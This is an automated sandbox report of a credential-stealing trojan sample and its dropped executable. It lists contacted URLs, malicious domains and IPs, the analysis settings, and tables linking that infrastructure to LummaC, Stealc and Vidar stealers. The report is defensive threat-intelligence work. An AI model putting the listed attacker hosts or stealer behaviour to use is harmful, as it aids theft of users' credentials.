                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://post-to-me.com/track_prt.php?sub=0&cc=DE6XIaCqh1vRm.exe, 00000000.00000002.3744603190.0000000000A80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                        unknown
                                                                                                                                                        https://help.steampowered.com/en/3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://steamcommunity.com/market/3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://store.steampowered.com/news/3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://store.steampowered.com/subscriber_agreement/3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org3247.tmp.exe, 00000003.00000003.1550918177.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://recaptcha.net/recaptcha/;3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://steamcommunity.com/discussions/3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://store.steampowered.com/stats/3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://medal.tv3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://broadcast.st.dl.eccdnx.com3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://store.steampowered.com/steam_refunds/3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://steamcommunity.com/G3247.tmp.exe, 00000003.00000002.1856295839.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550218661.0000000000C42000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://immureprech.biz/apix3247.tmp.exe, 00000003.00000002.1856236713.0000000000C16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://steamcommunity.com/login/home/?goto=profiles%2F765611997243319003247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620163247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://steamcommunity.com/workshop/3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://login.steampowered.com/3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb3247.tmp.exe, 00000003.00000003.1550829896.0000000000C8B000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550218661.0000000000C42000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://store.steampowered.com/legal/3247.tmp.exe, 00000003.00000003.1550218661.0000000000C24000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://steamcommunity.com/profiles/76561199724331900g3247.tmp.exe, 00000003.00000002.1856295839.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550218661.0000000000C42000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://recaptcha.net3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    http://upx.sf.netAmcache.hve.7.drfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://store.steampowered.com/3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          http://127.0.0.1:270603247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif3247.tmp.exe, 00000003.00000003.1550218661.0000000000C24000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.22.222 | immureprech.biz | United States | 13335 | CLOUDFLARENETUS | false
104.21.96.1 | deafeninggeh.biz | United States | 13335 | CLOUDFLARENETUS | false
104.21.56.70 | post-to-me.com | United States | 13335 | CLOUDFLARENETUS | false
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | false
176.113.115.19 | unknown | Russian Federation | 49505 | SELECTELRU | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1575128
Start date and time: 2024-12-14 14:07:19 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 38s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: XIaCqh1vRm.exe (renamed because the original name is a hash value)
Original Sample Name: e94835b4d3d35d99400dfd68fe580197.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@4/7@11/5
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 93%
• Number of executed functions: 41
• Number of non-executed functions: 336
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.189.173.22, 13.107.246.63, 20.12.23.50, 20.190.147.4
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
08:08:19 | API Interceptor | 9040452x Sleep call for process: XIaCqh1vRm.exe modified
08:08:25 | API Interceptor | 5x Sleep call for process: 3247.tmp.exe modified
08:09:09 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.22.222 | QQx0tdFC0b.exe | malicious | LummaC |
104.21.22.222 | Dqw8QFydEX.exe | malicious | LummaC |
104.21.22.222 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar |
104.21.22.222 | Loader.exe | malicious | LummaC |
104.21.22.222 | Download-Roblox-Solara.exe | malicious | LummaC |
104.21.22.222 | adv.ps1 | malicious | LummaC |
104.21.22.222 | http://gerxx.ru | malicious | Unknown |
104.21.22.222 | https://tdazl.fgfhgjyukh.top/?jul=17Y2Fzc2FuZHJhLmFwbGV5QHRoZXJtb2Zpc2hlci5jb20= | malicious | HTMLPhisher |
104.21.96.1 | SH8ZyOWNi2.exe | malicious | CMSBrute | pelisplus.so/administrator/index.php
104.21.96.1 | Recibos.exe | malicious | FormBook | www.mffnow.info/1a34/
104.21.56.70 | QQx0tdFC0b.exe | malicious | LummaC |
104.21.56.70 | LXS5itpTK7.exe | malicious | Stealc |
104.21.56.70 | ief722WreR.exe | malicious | Stealc |
104.21.56.70 | 7gxaFDUSOD.exe | malicious | Stealc |
104.21.56.70 | YQ3PhY2Aeq.exe | malicious | Stealc, Vidar |
104.21.56.70 | vwkb5DQRAL.exe | malicious | Stealc, Vidar |
104.21.56.70 | Tg3sk2wywR.exe | malicious | Stealc |
104.21.56.70 | x8AH98H0eQ.exe | malicious | Stealc |
104.21.56.70 | x8AH98H0eQ.exe | malicious | Unknown |
104.21.56.70 | zGHItMC5Zc.exe | malicious | Stealc |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
immureprech.biz | QQx0tdFC0b.exe | malicious | LummaC | 104.21.22.222
immureprech.biz | HIDE0RerES.exe | malicious | LummaC | 172.67.207.38
immureprech.biz | Dqw8QFydEX.exe | malicious | LummaC | 104.21.22.222
immureprech.biz | SET_UP.exe | malicious | LummaC | 172.67.207.38
immureprech.biz | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 104.21.22.222
immureprech.biz | Setup.exe | malicious | LummaC Stealer | 172.67.207.38
immureprech.biz | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar | 172.67.207.38
immureprech.biz | Loader.exe | malicious | LummaC | 104.21.22.222
immureprech.biz | IFTM0g0NWX.exe | malicious | LummaC | 172.67.207.38
immureprech.biz | Download-Roblox-Solara.exe | malicious | LummaC | 104.21.22.222
steamcommunity.com | QQx0tdFC0b.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | HIDE0RerES.exe | malicious | LummaC | 104.102.49.254
steamcommunity.com | Dqw8QFydEX.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | 7VfKPMdmiX.exe | malicious | Unknown | 23.55.153.106
steamcommunity.com | 7VfKPMdmiX.exe | malicious | Unknown | 23.55.153.106
steamcommunity.com | SET_UP.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 23.55.153.106
steamcommunity.com | Setup.exe | malicious | LummaC Stealer | 23.55.153.106
steamcommunity.com | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar | 23.55.153.106
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    post-to-me.comQQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    LXS5itpTK7.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    SEejSLAS9f.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                                    • 172.67.179.207
                                                                                                                                                                                                                                                                    EbXj93v3bO.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                                    • 172.67.179.207
                                                                                                                                                                                                                                                                    ssB9bjDQPf.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                                    • 172.67.179.207
                                                                                                                                                                                                                                                                    ief722WreR.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    7gxaFDUSOD.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    YQ3PhY2Aeq.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    6X4BIzTTBR.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                                    • 172.67.179.207
                                                                                                                                                                                                                                                                    vwkb5DQRAL.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                    CLOUDFLARENETUSPqCznDthHP.exeGet hashmaliciousEdge StealerBrowse
                                                                                                                                                                                                                                                                    • 104.26.13.205
                                                                                                                                                                                                                                                                    PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                    • 104.21.84.67
                                                                                                                                                                                                                                                                    QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    HIDE0RerES.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    Dqw8QFydEX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.112.1
                                                                                                                                                                                                                                                                    ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                    • 172.67.220.36
                                                                                                                                                                                                                                                                    order confirmation.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                    • 104.21.90.137
                                                                                                                                                                                                                                                                    Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                                    • 172.67.177.134
                                                                                                                                                                                                                                                                    Setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                    • 104.21.58.24
                                                                                                                                                                                                                                                                    SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    CLOUDFLARENETUSPqCznDthHP.exeGet hashmaliciousEdge StealerBrowse
                                                                                                                                                                                                                                                                    • 104.26.13.205
                                                                                                                                                                                                                                                                    PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                    • 104.21.84.67
                                                                                                                                                                                                                                                                    QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    HIDE0RerES.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    Dqw8QFydEX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.112.1
                                                                                                                                                                                                                                                                    ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                    • 172.67.220.36
                                                                                                                                                                                                                                                                    order confirmation.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                    • 104.21.90.137
                                                                                                                                                                                                                                                                    Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                                    • 172.67.177.134
                                                                                                                                                                                                                                                                    Setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                    • 104.21.58.24
                                                                                                                                                                                                                                                                    SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    CLOUDFLARENETUSPqCznDthHP.exeGet hashmaliciousEdge StealerBrowse
                                                                                                                                                                                                                                                                    • 104.26.13.205
                                                                                                                                                                                                                                                                    PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                    • 104.21.84.67
                                                                                                                                                                                                                                                                    QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    HIDE0RerES.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    Dqw8QFydEX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.112.1
                                                                                                                                                                                                                                                                    ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                    • 172.67.220.36
                                                                                                                                                                                                                                                                    order confirmation.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                    • 104.21.90.137
                                                                                                                                                                                                                                                                    Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                                    • 172.67.177.134
                                                                                                                                                                                                                                                                    Setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                    • 104.21.58.24
                                                                                                                                                                                                                                                                    SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    AKAMAI-ASUSHIDE0RerES.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                                                    https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=documentGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                    • 184.30.20.187
                                                                                                                                                                                                                                                                    18037.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                    • 23.208.128.109
                                                                                                                                                                                                                                                                    FW_ TBI Construction Company.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                    • 2.19.198.209
                                                                                                                                                                                                                                                                    elitebotnet.sh4.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                                    • 104.86.46.42
                                                                                                                                                                                                                                                                    https://docs.google.com/presentation/d/e/2PACX-1vTBMx4bSFDj_B_GCJTdTqUpVgpLXyQPR3uFGYP9j81KKHswOSbzMWDM5ZByYtVAwpACe-iOzHmzehje/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
    • 23.44.104.237
  Sample: naukri-launcher 10.exe | Detection: malicious | Threat Name: Unknown
    • 104.77.222.99
  Sample: naukri-launcher 10.exe | Detection: malicious | Threat Name: Unknown
    • 104.77.222.99
  Sample: powerpc.nn.elf | Detection: malicious | Threat Name: Mirai, Okiru
    • 23.15.56.98
  Sample: x86_32.nn.elf | Detection: malicious | Threat Name: Mirai, Okiru
    • 23.44.156.92
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: a0e9f5d64349fb13191bc781f81f42e1
  Sample: QQx0tdFC0b.exe | Detection: malicious | Threat Name: LummaC
    • 104.102.49.254
    • 104.21.22.222
    • 104.21.96.1
  Sample: HIDE0RerES.exe | Detection: malicious | Threat Name: LummaC
    • 104.102.49.254
    • 104.21.22.222
    • 104.21.96.1
  Sample: Dqw8QFydEX.exe | Detection: malicious | Threat Name: LummaC
    • 104.102.49.254
    • 104.21.22.222
    • 104.21.96.1
  Sample: SET_UP.exe | Detection: malicious | Threat Name: LummaC
    • 104.102.49.254
    • 104.21.22.222
    • 104.21.96.1
  Sample: file.exe | Detection: malicious | Threat Name: LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
    • 104.102.49.254
    • 104.21.22.222
    • 104.21.96.1
  Sample: Setup.exe | Detection: malicious | Threat Name: LummaC Stealer
    • 104.102.49.254
    • 104.21.22.222
    • 104.21.96.1
  Sample: file.exe | Detection: malicious | Threat Name: LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar
    • 104.102.49.254
    • 104.21.22.222
    • 104.21.96.1
  Sample: file.exe | Detection: malicious | Threat Name: Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig
    • 104.102.49.254
    • 104.21.22.222
    • 104.21.96.1
  Sample: file.exe | Detection: malicious | Threat Name: Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig
    • 104.102.49.254
    • 104.21.22.222
    • 104.21.96.1
  Sample: file.exe | Detection: malicious | Threat Name: Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig
    • 104.102.49.254
    • 104.21.22.222
    • 104.21.96.1
Match: 37f463bf4616ecd445d4a1937da06e19
  Sample: PO_0099822111ORDER.js | Detection: malicious | Threat Name: Remcos
    • 104.21.56.70
  Sample: QQx0tdFC0b.exe | Detection: malicious | Threat Name: LummaC
    • 104.21.56.70
  Sample: 7VfKPMdmiX.exe | Detection: malicious | Threat Name: Unknown
    • 104.21.56.70
  Sample: 7VfKPMdmiX.exe | Detection: malicious | Threat Name: Unknown
    • 104.21.56.70
  Sample: Setup.msi | Detection: malicious | Threat Name: Unknown
    • 104.21.56.70
  Sample: file.exe | Detection: malicious | Threat Name: LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
    • 104.21.56.70
  Sample: file.exe | Detection: malicious | Threat Name: LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar
    • 104.21.56.70
  Sample: file.exe | Detection: malicious | Threat Name: Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig
    • 104.21.56.70
  Sample: file.exe | Detection: malicious | Threat Name: Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig
    • 104.21.56.70
  Sample: file.exe | Detection: malicious | Threat Name: Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig
    • 104.21.56.70
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: C:\Users\user\AppData\Local\Temp\3247.tmp.exe
  Sample: QQx0tdFC0b.exe | Detection: malicious | Threat Name: LummaC
Match: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\ScreenUpdateSync[1].exe
  Sample: QQx0tdFC0b.exe | Detection: malicious | Threat Name: LummaC

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.9562623586080256
Encrypted: false
